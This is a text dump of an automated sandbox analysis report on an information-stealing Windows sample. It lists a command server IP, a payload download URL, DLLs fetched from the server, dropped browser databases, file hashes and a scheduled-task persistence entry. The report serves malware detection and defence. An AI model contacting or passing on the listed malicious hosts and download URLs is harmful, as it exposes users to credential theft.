                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\627982\Pct.pif5%ReversingLabs
                    C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe74%ReversingLabsWin32.Ransomware.RedLine

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                    https://support.mozilla.org0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sst.my
                    		103.6.198.219
                    		truetrue
                      		unknown
                      18.31.95.13.in-addr.arpa
                      		unknown
                      		unknowntrue
                        		unknown
                        hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYW
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://45.145.4.234/bc17a177456805bc/msvcp140.dlltrue
                            		unknown
                            http://45.145.4.234/true
                              		unknown
                              http://45.145.4.234/bc17a177456805bc/freebl3.dlltrue
                                		unknown
                                https://sst.my/folder/l3.exefalse
                                  		unknown
                                  http://45.145.4.234/ce4b71a59f4ee761.phptrue
                                    		unknown
                                    http://45.145.4.234/bc17a177456805bc/mozglue.dlltrue
                                      		unknown
                                      http://45.145.4.234/bc17a177456805bc/sqlite3.dlltrue
                                        		unknown
                                        http://45.145.4.234/bc17a177456805bc/softokn3.dlltrue
                                          		unknown
                                          http://45.145.4.234/bc17a177456805bc/vcruntime140.dlltrue
                                            		unknown
                                            http://45.145.4.234/bc17a177456805bc/nss3.dlltrue
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabFIDGDAKF.11.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.usertrusDPct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://45.145.4.234/bc17a177456805bc/softokn3.dllnPct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://45.145.4.234/ce4b71a59f4ee761.phpestPct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://ocsp.sectigo.com0KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crt.usOPct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drfalse
                                                        		unknown
                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                          		unknown
                                                          http://45.145.4.234art/form-data;Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://45.145.4.234/bc17a177456805bc/msvcp140.dllXPct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://45.145.4.234/ce4b71a59f4ee761.phpRCHtPct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.sqlite.org/copyright.html.Pct.pif, 0000000B.00000002.3830611184.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmp, Cake.0.dr, Pct.pif.2.drfalse
                                                                  		unknown
                                                                  http://www.mozilla.com/en-US/blocklist/Pct.pif, Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.drfalse
                                                                    		unknown
                                                                    http://45.145.4.234tPct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://sectigo.com/CPS0KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://mozilla.org0/softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoFIDGDAKF.11.drfalse
                                                                        		unknown
                                                                        http://45.145.4.234/gPct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                            		unknown
                                                                            http://45.145.4.234/ce4b71a59f4ee761.phpDrivePct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiKJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                                		unknown
                                                                                http://45.145.4.234/ce4b71a59f4ee761.phpry=----BGDHDAFIDGDBGCAAFIDHefault-releasePct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://45.145.4.234/ce4b71a59f4ee761.phpWSPct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.ecosia.org/newtab/FIDGDAKF.11.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://45.145.4.234/bc17a177456805bc/nss3.dlldPct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brJJDGIIDHJEBGIDHJJDBKEHCAAA.11.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                                        		unknown
                                                                                        https://sst.my/Pct.pif, 0000000B.00000002.3806610592.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ac.ecosia.org/autocomplete?q=FIDGDAKF.11.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tKFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://ac.ecopnaclPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtJJDGIIDHJEBGIDHJJDBKEHCAAA.11.drfalse
                                                                                              		unknown
                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://45.145.4.234Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmptrue
                                                                                                		unknown
                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                                                  		unknown
                                                                                                  https://support.mozilla.orgJJDGIIDHJEBGIDHJJDBKEHCAAA.11.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://ac.ecopPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FIDGDAKF.11.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaPct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drfalse
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      103.6.198.219
                                                                                                      		sst.myMalaysia
                                                                                                      		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                                                                                                      45.145.4.234
                                                                                                      		unknownRussian Federation
                                                                                                      		200019ALEXHOSTMDtrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1527287
                                                                                                      Start date and time:2024-10-06 22:15:19 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 11m 20s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:28
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:file.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@34/39@3/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 94%
                                                                                                      • Number of executed functions: 99
                                                                                                      • Number of non-executed functions: 291
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: file.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      16:16:57API Interceptor4419x Sleep call for process: Pct.pif modified
                                                                                                      16:19:31API Interceptor705123x Sleep call for process: oobeldr.exe modified
                                                                                                      22:18:58Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      103.6.198.219file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        45.145.4.234file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        • 45.145.4.234/ce4b71a59f4ee761.php

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        sst.myfile.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        • 103.6.198.219

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        ALEXHOSTMD8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                        • 176.123.7.102
                                                                                                        rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 176.123.9.220
                                                                                                        https://airdrop-manta.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 176.123.0.55
                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        • 45.145.4.234
                                                                                                        http://manta-network.de/Get hashmaliciousUnknownBrowse
                                                                                                        • 176.123.0.55
                                                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 176.123.5.29
                                                                                                        botirc.i686.elfGet hashmaliciousTsunamiBrowse
                                                                                                        • 176.123.2.219
                                                                                                        botirc.m68k.elfGet hashmaliciousTsunamiBrowse
                                                                                                        • 176.123.2.219
                                                                                                        botirc.mpsl.elfGet hashmaliciousTsunamiBrowse
                                                                                                        • 176.123.2.219
                                                                                                        botirc.arm6.elfGet hashmaliciousTsunamiBrowse
                                                                                                        • 176.123.2.219
                                                                                                        EXABYTES-AS-APExaBytesNetworkSdnBhdMYz92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        • 103.6.198.219
                                                                                                        PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 103.6.198.178
                                                                                                        purchase order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 103.6.198.178
                                                                                                        rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197
                                                                                                        PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 110.4.45.197

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        37f463bf4616ecd445d4a1937da06e19setup_installer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                        • 103.6.198.219
                                                                                                        file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                        • 103.6.198.219
                                                                                                        file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                        • 103.6.198.219
                                                                                                        zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 103.6.198.219
                                                                                                        buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                        • 103.6.198.219
                                                                                                        InstallSetup.exeGet hashmaliciousStealcBrowse
                                                                                                        • 103.6.198.219
                                                                                                        Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 103.6.198.219
                                                                                                        file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                        • 103.6.198.219
                                                                                                        rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 103.6.198.219
                                                                                                        w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 103.6.198.219

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\ProgramData\KFCFBFHIEB.exefile.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                                                              file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                            C:\ProgramData\freebl3.dllcmBxQ7gA5a.exeGet hashmaliciousVidarBrowse
                                                                                                                              vmgon5Zqja.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        f2e7fcb20146.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                          7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                            ScreenUpdateSync.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\EBFBFBFIIJDAKECAKKJEHCFIJK

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\FCFHJKJJJECGDHJJDHDAAAFBKF

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.8508558324143882
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\FCGIJKJJ

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):196608
                                                                                                                                                Entropy (8bit):1.1239949490932863
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\FIDGDAKF

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\GCFCFCGCGIEHIECAFCFIJJKKFH

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
